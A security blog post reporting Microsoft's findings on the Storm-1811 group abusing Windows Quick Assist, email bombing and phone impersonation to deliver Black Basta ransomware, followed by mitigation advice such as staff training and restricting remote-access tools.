Fraudsters Leveraging Quick Assist Feature for Ransomware Attacks

1 vote, average: 5.00 out of 51 vote, average: 5.00 out of 51 vote, average: 5.00 out of 51 vote, average: 5.00 out of 51 vote, average: 5.00 out of 5 (1 votes, average: 5.00 out of 5, rated)
Black Basta Ransomware Attack

Cybercriminals with a monetary incentive use Windows Quick Assist in social engineering schemes to infect victims’ networks with Black Basta ransomware payloads.

Microsoft has been looking at this effort since at least mid-April 2024. Based on their observations, the threat group (Storm-1811) began email bombing the target after adding their addresses to several email subscription services.

The organization stated in a May 15, 2024 report, “Storm-1811 is a financially motivated cybercriminal group known to deploy Black Basta ransomware.”

The attack chain includes delivering QakBot, Cobalt Strike, and finally, Black Basta ransomware to vulnerable victims using voice phishing impersonation to deceive them into downloading remote monitoring and management (RMM) software.

Threat actors misuse Quick Assist features to perform social engineering attacks by pretending, for example, to be a trusted contact like Microsoft technical support or an IT professional from the target user’s company to gain initial access to a target device.

– The Tech Gaint Stated.

What is Quick Assist?

With Quick Assist, users can remotely share their Windows or macOS device with another person to troubleshoot technical issues with their systems. Quick Assist is a legitimate Microsoft application. On Windows 11-powered devices, it is preinstalled.

Since Quick Assist enables device sharing through a remote connection, malicious activity may occur.

Additionally, this makes it simpler for fraudulent individuals who deceive customers into giving them complete access to the targeted device by pretending to be tech assistants.

The threat actors use link listing attacks, a sort of email bombing attack, to increase the credibility of their attacks by flooding the targeted email addresses with subscribed content. This is done by having the targeted email addresses sign up for multiple reputable email subscription services.

Misusing Legitimate Windows Applications

According to a blog post by Microsoft Threat Intelligence, Storm-1811 uses this channel to send viruses to victim devices once they build confidence and acquire remote access.

The ultimate goal of this process is to transmit Black Basta ransomware for financial benefit. In addition, victims can get an inbox full of emails and later phone scams from scammers posing as IT or support staff.

According to security experts, the attacks show how simple it is for threat actors to misuse authorized remote-access capabilities to trick and compromise individuals, mainly if they are skilled at using social engineering to trick a victim into falling for a harmful pretense.

Cybercriminals turn to advanced social engineering attacks whenever they are unable to compromise weak credentials or use basic phishing emails to breach an organization

~ According to Darren Guccione, the CEO and co-founder of Keeper Security, in an email to Dark Reading

According to him, the increasing complexity of attacks and their sophisticated use of remote-access technologies underscores the necessity of staff members receiving continual training and instruction on how to recognize these strategies as they develop.

The Ransom Technique – Black Basta

The cybercrime gang Conti split into several groups, one of which is considered Black Basta after it shut down two years ago because of a string of embarrassing data breaches.

A ransomware-as-a-service (RaaS) activity known as Black Basta first surfaced in April 2022.

The American Dental Association, the Toronto Public Library, the German defense contractor Rheinmetall, the United Kingdom’s technology outsourcing company Capita, the industrial automation company and government contractor ABB, Sobeys, Knauf, and Yellow Pages Canada are just a few of the well-known victims that its affiliates have breached since then.

A ransomware attack that impacted the massive American healthcare provider Ascension more recently was connected to Black Basta, causing them to reroute ambulances to unaffected sites.

Recommended: WannaCry Ransomware Attack: Everything to Know

Research from cyber insurance provider Corvus Insurance and cybersecurity company Elliptic suggests that, as of November 2023, Black Basta has received at least $100 million in ransom payments from more than 90 victims.

How to Minimize Quick Assist Attacks?

Organizations are advised to teach staff how to identify fraudulent tech support activities and restrict or uninstall Quick Assist and related remote monitoring and management software when Not being used.

This will be a simple and easy approach to lessen the risk of such attacks, as both Microsoft and experts have warned, given how vulnerable an organization is once a corporate user voluntarily grants attackers remote access to their workstations.

With a zero-trust architecture, an organization can also deploy a privilege access management (PAM) system that “prevents unauthorized privilege escalation and ensures that user access roles are strongly enforced,” according to Guccione.

Although Guccione identified that “anyone” can fall for vishing and social engineering-based attacks, Microsoft and experts recommended that organizations use advanced and consistent employee training to assist them in spotting these types of attacks. This can help prevent compromise.

Janki Mehta

Janki Mehta

Janki Mehta is a passionate Cyber-Security Enthusiast who keenly monitors the latest developments in the Web/Cyber Security industry. She puts her knowledge into practice and helps web users by arming them with the necessary security measures to stay safe in the digital world.